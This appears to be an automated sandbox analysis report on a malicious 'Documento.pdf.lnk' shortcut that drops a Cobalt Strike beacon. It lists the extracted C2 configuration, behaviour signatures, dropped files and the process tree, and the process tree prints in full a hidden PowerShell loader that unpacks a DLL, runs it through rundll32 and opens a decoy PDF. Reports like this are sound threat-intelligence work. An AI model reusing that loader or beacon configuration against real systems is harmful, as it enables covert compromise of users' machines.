Analysis

  • max time kernel
    148s
  • max time network
    143s
  • platform
    windows10-1703_x64
  • resource
    win10-20220812-en
  • resource tags

    arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
  • submitted
    10-02-2023 15:05

General

  • Target

    Documento.pdf.lnk

  • Size

    592KB

  • MD5

    2a26b3354a0daeb38079a62471ab5ba8

  • SHA1

    711a6790e2e50a949297d10c47e9fc3e8d2632fb

  • SHA256

    7cc53f1b2b4eac4e9acd5722cc179ba4094f3101ec7b9e3874755ea501fa4aa3

  • SHA512

    e5620f60dea102742f0fb0252a87647bc3ee4eaf304866f3d028f5b0868e3a2179a1a9f46b46faefd077de09348b25c962b8a41eecfb8768a56c9fb4c2aa21cb

  • SSDEEP

    12288:3HQSYtswIsMXhZEpUrvXVX1dPb7dnJGnpu8QjUDZUndu8kd:37RsMXhuePVFVJknpu8Qj68kd

Malware Config

Extracted

Family

cobaltstrike

Botnet

391144938

C2

http://192.168.56.3:80/cr.css

Attributes
  • access_type

    512

  • host

    192.168.56.3,/cr.css

  • http_header1

    AAAACgAAABFDb25uZWN0aW9uOiBjbG9zZQAAAAoAAAAPQWNjZXB0OiBpbWFnZS8qAAAACgAAACVBY2NlcHQtTGFuZ3VhZ2U6IGVuLUdCO3E9MC45LCAqO3E9MC43AAAABwAAAAAAAAAPAAAAAwAAAAIAAAArd29yZHByZXNzX2VkMWY2MTdiYmQ2YzAwNGNjMDllMDQ2ZjNjMWI3MTQ4PQAAAAYAAAAGQ29va2llAAAACQAAAApkb2l0PWZhbHNlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

  • http_header2

    AAAACgAAABFDb25uZWN0aW9uOiBjbG9zZQAAAAoAAAAYQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluAAAABwAAAAEAAAAIAAAAAwAAAAQAAAAHAAAAAAAAAAMAAAACAAAADl9fc2Vzc2lvbl9faWQ9AAAABgAAAAZDb29raWUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

  • http_method1

    GET

  • http_method2

    POST

  • jitter

    9984

  • polling_time

    63898

  • port_number

    80

  • sc_process32

    %windir%\syswow64\WUAUCLT.exe

  • sc_process64

    %windir%\sysnative\WUAUCLT.exe

  • state_machine

    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCAP2p67B2EuiUUNi4YopVGqDxIAVr4kwkDbycHatN9jwkxSkTJT6iyeXzcJ7Sc+hNbrZLdRa6zzMJG0BELkNQ+l3WrPnS2ca8Bvc0OjwqomRe/Fzb+e8+Qnpq4ATCLY5idTtx/uPMX0AnpjFzp/Pqer/fND80DVh+xkh/c+43/XwIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • unknown1

    3.010993152e+09

  • unknown2

    AAAABAAAAAIAAAbnAAAAAwAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • uri

    /av

  • user_agent

    Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0

  • watermark

    391144938

Signatures

  • Cobaltstrike

    Detected malicious payload which is part of Cobaltstrike.

  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Documento.pdf.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2584
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden $obf_lnkpath = Get-ChildItem *.lnk ^| where-object {$_.length -eq 00607058} ^| Select-Object -ExpandProperty FullName;$obf_file = [system.io.file]::ReadAllBytes($obf_lnkpath);$obf_path = 'C:\Users\Admin\AppData\Local\Temp\tmp'+(Get-Random)+'.zip';$obf_path = [Environment]::ExpandEnvironmentVariables($obf_path);$obf_dir = [System.IO.Path]::GetDirectoryName($obf_path);[System.IO.File]::WriteAllBytes($obf_path, $obf_file[002456..($obf_file.length)]);cd $obf_dir;Expand-Archive -Path $obf_path -DestinationPath . -EA SilentlyContinue -Force ^| Out-Null;Remove-Item -Path $obf_path -EA SilentlyContinue -Force ^| Out-Null;^& rundll32.exe $obf_dir\bloated-pestilence.dll,runner; .\sample.pdf
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3736
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -windowstyle hidden $obf_lnkpath = Get-ChildItem *.lnk | where-object {$_.length -eq 00607058} | Select-Object -ExpandProperty FullName;$obf_file = [system.io.file]::ReadAllBytes($obf_lnkpath);$obf_path = 'C:\Users\Admin\AppData\Local\Temp\tmp'+(Get-Random)+'.zip';$obf_path = [Environment]::ExpandEnvironmentVariables($obf_path);$obf_dir = [System.IO.Path]::GetDirectoryName($obf_path);[System.IO.File]::WriteAllBytes($obf_path, $obf_file[002456..($obf_file.length)]);cd $obf_dir;Expand-Archive -Path $obf_path -DestinationPath . -EA SilentlyContinue -Force | Out-Null;Remove-Item -Path $obf_path -EA SilentlyContinue -Force | Out-Null;& rundll32.exe $obf_dir\bloated-pestilence.dll,runner; .\sample.pdf
        3⤵
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4732
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\bloated-pestilence.dll,runner
          4⤵
          • Loads dropped DLL
          PID:4280
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\sample.pdf"
          4⤵
          • Checks processor information in registry
          • Modifies Internet Explorer settings
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:976
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
            5⤵
              PID:2260
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
              5⤵
                PID:3908
              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:536
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8F6A7207077DD28242BF143588107179 --mojo-platform-channel-handle=1632 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                  6⤵
                    PID:4860
                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=E709FE50F5A61E9465BF4C6A5C1DA41A --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=E709FE50F5A61E9465BF4C6A5C1DA41A --renderer-client-id=2 --mojo-platform-channel-handle=1648 --allow-no-sandbox-job /prefetch:1
                    6⤵
                      PID:4376
                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                    5⤵
                      PID:1396
                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                      5⤵
                        PID:1048
                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8D64CAB860232168B82934B1F572F590 --mojo-platform-channel-handle=1636 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                          6⤵
                            PID:2656
                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=54FB3DD0AEC6D5D312488CDB81029BDB --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=54FB3DD0AEC6D5D312488CDB81029BDB --renderer-client-id=2 --mojo-platform-channel-handle=1648 --allow-no-sandbox-job /prefetch:1
                            6⤵
                              PID:4044
                            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=0AB4320F911377DA7F8B9D36E2F90F52 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=0AB4320F911377DA7F8B9D36E2F90F52 --renderer-client-id=4 --mojo-platform-channel-handle=2092 --allow-no-sandbox-job /prefetch:1
                              6⤵
                                PID:5116
                              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=43B6A2C3C327E92BC47BB9F479AF838E --mojo-platform-channel-handle=2484 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                6⤵
                                  PID:616
                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=CF6F9A408E6F0BC2335C15E1F3FE391A --mojo-platform-channel-handle=1640 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                  6⤵
                                    PID:5112
                                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=ABA0DD6EAACF2BE0C1FC302CEA17E51A --mojo-platform-channel-handle=2616 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                    6⤵
                                      PID:1248
                                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                    5⤵
                                      PID:4932

                            Network

                            MITRE ATT&CK Enterprise v6

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Local\Temp\bloated-pestilence.dll

                              Filesize

                              200.5MB

                              MD5

                              a1fbc3b06df134b68e76476080c85bc4

                              SHA1

                              51dec4482eb41cd388c15a19d4cb1499ccb2235d

                              SHA256

                              6bcb22eb8e8e9f6844f31725610ee06fadcca3b4c6e8b738aafa12f6bbf34482

                              SHA512

                              1536f5761cc6421eb8d0387ef457358f8f7f4eab1822794c2496202ce71de0a5ef9bc45e07f17315714a79c7f58cb3576024ded4f1ebcb218b06b30484ebc45f

                            • C:\Users\Admin\AppData\Local\Temp\sample.pdf

                              Filesize

                              2KB

                              MD5

                              4b41a3475132bd861b30a878e30aa56a

                              SHA1

                              bfd009f500c057195ffde66fae64f92fa5f59b72

                              SHA256

                              8decc8571946d4cd70a024949e033a2a2a54377fe9f1c1b944c20f9ee11a9e51

                              SHA512

                              eaf7542ade2c338d8d2cc76fcbf883e62c31336e60cb236f86ed66c8154ea9fb836fd88367880911529bdafed0e76cd34272123a4d656db61b120b95eaa3e069

                            • \Users\Admin\AppData\Local\Temp\bloated-pestilence.dll

                              Filesize

                              200.5MB

                              MD5

                              a1fbc3b06df134b68e76476080c85bc4

                              SHA1

                              51dec4482eb41cd388c15a19d4cb1499ccb2235d

                              SHA256

                              6bcb22eb8e8e9f6844f31725610ee06fadcca3b4c6e8b738aafa12f6bbf34482

                              SHA512

                              1536f5761cc6421eb8d0387ef457358f8f7f4eab1822794c2496202ce71de0a5ef9bc45e07f17315714a79c7f58cb3576024ded4f1ebcb218b06b30484ebc45f

                            • memory/536-448-0x0000000000000000-mapping.dmp

                            • memory/616-1234-0x0000000000000000-mapping.dmp

                            • memory/976-227-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-217-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-190-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-191-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-192-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-193-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-194-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-195-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-196-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-197-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-198-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-199-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-200-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-201-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-202-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-203-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-204-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-185-0x0000000000000000-mapping.dmp

                            • memory/976-206-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-207-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-208-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-209-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-210-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-228-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-212-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-213-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-214-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-215-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-216-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-229-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-218-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-219-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-220-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

                            • memory/976-221-0x0000000077A40000-0x0000000077BCE000-memory.dmp

                              Filesize

                              1.6MB

